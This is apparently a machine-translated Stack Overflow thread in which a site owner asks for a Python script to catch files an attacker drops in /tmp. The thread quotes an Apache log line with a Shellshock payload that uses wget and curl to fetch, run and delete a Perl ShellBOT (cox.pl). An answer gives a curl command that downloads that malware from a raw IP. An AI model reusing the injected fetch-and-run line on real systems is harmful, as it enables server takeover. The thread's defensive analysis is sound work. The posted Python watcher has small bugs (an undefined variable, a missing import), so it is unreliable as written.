用于监视目录中新文件的python脚本

用于监视目录中新文件的python脚本,python,Python,有人问过类似的问题,但这些问题要么对我不起作用,要么我无法理解答案 我运行Apache2 Web服务器并托管一些小型个人网站。我正在被网络跟踪,或者有人试图攻击我 Apache2访问日志显示 195.154.80.205--[05/Nov/2015:09:57:09+0000]“GET/info.cgi HTTP/1.1”404 464“-”({:;};/usr/bin/perl-e'print\”内容类型:text/plain\r\n\r\nXSUCCESS\“系统(\“wget-O/tmp/

有人问过类似的问题,但这些问题要么对我不起作用,要么我无法理解答案

我运行Apache2 Web服务器并托管一些小型个人网站。我正在被网络跟踪,或者有人试图攻击我

Apache2访问日志显示

195.154.80.205--[05/Nov/2015:09:57:09+0000]“GET/info.cgi HTTP/1.1”404 464“-”({:;};/usr/bin/perl-e'print\”内容类型:text/plain\r\n\r\nXSUCCESS\“系统(\“wget-O/tmp/cox.pl;curl-O/tmp/cox.pl/tmp/cox.pl;rm-rf/tmp/cox.pl*\”);”

这显然是试图(在我的日志中一次又一次)强制我的服务器下载'cox.pl',然后运行'cox.pl',然后删除'cox.pl'

我真的想知道
cox.pl
中有什么,它可能是github上的一个修改版本

我想要一个脚本,该脚本将不断监视我的
/tmp
文件夹,并在添加新文件时,将该文件复制到另一个目录,以便我查看它正在做什么,或至少尝试做什么


我知道我可以拒绝访问等,但我想知道这些黑客试图做什么,看看我是否可以收集有关他们的情报

所讨论的脚本可以很容易地下载,它包含
ShellBOT by:devil\uuuu
所以。。。猜测;-)

您可以使用from,但不需要使用此特定案例。照办

curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
检查脚本

它看起来像是Linux 2.4.17-2.6.17的一套很好的黑客套件,可能还有BSD*,对我来说不是那么无害,与IRC相关。这与我无关。

我找到了解决办法

这是密码

path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
        after = dict ([(f, None) for f in os.listdir (path_to_watch)])
        added = [f for f in after if not f in before]
        if added:
                print("Added: ", ", ".join (added))
                break
        else:
             before = after
我已经编辑了代码,原始代码可以在

原始代码是用Python2X编写的,因此需要用Python3进行转换

注:-


当您在PATH中添加任何文件时,它都会打印文本并中断,如果没有添加任何文件,它将继续运行。

您请求了python—但是,您可能需要查看
inotifywait
。我认为你想做的事情可以通过一个短的命令行管道来完成。你很可能没有被跟踪,只是服务器在某个脚本探测已知漏洞的位置列表上。请参阅-该
cox.pl
是有效负载,如果您受到该漏洞的影响,它将运行。@Matt Jacob,所讨论的攻击依赖于
bash
中的一个严重错误。没有
eval
参与。Re“我真的想知道'cox.pl'中有什么,所以下载它。只是不要运行它。您已经确保您的shell不易受到Shellshock攻击,这样您的服务器就不会首先下载文件,对吗?